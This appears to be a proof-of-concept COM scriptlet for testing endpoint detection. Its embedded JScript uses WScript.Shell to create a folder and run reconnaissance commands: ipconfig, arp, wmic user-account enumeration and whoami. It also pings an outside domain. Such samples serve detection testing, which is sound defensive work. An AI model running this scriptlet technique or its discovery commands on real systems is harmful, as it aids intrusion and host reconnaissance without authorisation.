<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("mkdir c:\\edrtest");
var r = new ActiveXObject("WScript.Shell").Run("ipconfig /all > c:\\edrtest\\ipconfig.txt");
var r = new ActiveXObject("WScript.Shell").Run("arp -a");  
var r = new ActiveXObject("WScript.Shell").Run("ping nato-press.com");  
var r = new ActiveXObject("WScript.Shell").Run("wmic useraccount get /ALL");  
var r = new ActiveXObject("WScript.Shell").Run("whoami");  
]]>
</script>
</registration>
</scriptlet>

